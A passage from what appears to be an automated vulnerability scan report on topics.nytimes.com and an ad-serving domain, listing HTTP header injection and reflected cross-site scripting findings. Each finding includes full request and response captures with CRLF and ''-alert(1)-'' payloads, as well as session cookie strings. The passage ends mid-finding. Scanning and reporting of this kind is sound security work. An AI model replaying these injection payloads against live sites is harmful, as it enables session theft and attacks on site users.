HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/919c2 da221e78489/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.78. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 22697%0d%0afed4a746118 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/reference/22697%0d%0afed4a746118/subjects/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/22697 fed4a746118/subjects/o/oil_spills/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.79. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 30fc6%0d%0ad1ceed21046 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/30fc6%0d%0ad1ceed21046/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/30fc6 d1ceed21046/o/oil_spills/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.80. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload ae3e4%0d%0aa980ea2e2c8 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/subjects/ae3e4%0d%0aa980ea2e2c8/oil_spills/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/subjects/ae3e4 a980ea2e2c8/oil_spills/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.81. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 6]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload 2d948%0d%0a63790b1a5b0 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/subjects/o/2d948%0d%0a63790b1a5b0/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/subjects/o/2d948 63790b1a5b0/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.82. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 7]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/
Issue detail
The value of REST URL parameter 7 is copied into the Location response header. The payload 4e69e%0d%0a3e883c89cca was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/subjects/o/oil_spills/4e69e%0d%0a3e883c89cca/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/4e69e 3e883c89cca/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
3. Cross-site scripting (reflected)
There are 380 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9b9f'-alert(1)-'8238608c5a5 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5f9b9f'-alert(1)-'8238608c5a5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5f9b9f'-alert(1)-'8238608c5a5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
3.2. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 450fc'-alert(1)-'b995b495789 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1450fc'-alert(1)-'b995b495789&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1450fc'-alert(1)-'b995b495789&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
3.3. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aecd'-alert(1)-'d6c622015b2 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=2aecd'-alert(1)-'d6c622015b2 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... age=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=2aecd'-alert(1)-'d6c622015b2http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
3.4. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af617'-alert(1)-'531d756a960 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=&af617'-alert(1)-'531d756a960=1 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 688
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/126/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... ge=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=&af617'-alert(1)-'531d756a960=1http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
3.5. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d5c6'-alert(1)-'c0cdb14aea7 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html8d5c6'-alert(1)-'c0cdb14aea7&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:48:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html8d5c6'-alert(1)-'c0cdb14aea7&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/pro ...[SNIP]...
3.6. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63430'-alert(1)-'c47c9696e39 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto63430'-alert(1)-'c47c9696e39&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:48:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto63430'-alert(1)-'c47c9696e39&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b6 ...[SNIP]...
3.7. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d7a9'-alert(1)-'b1576cde699 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
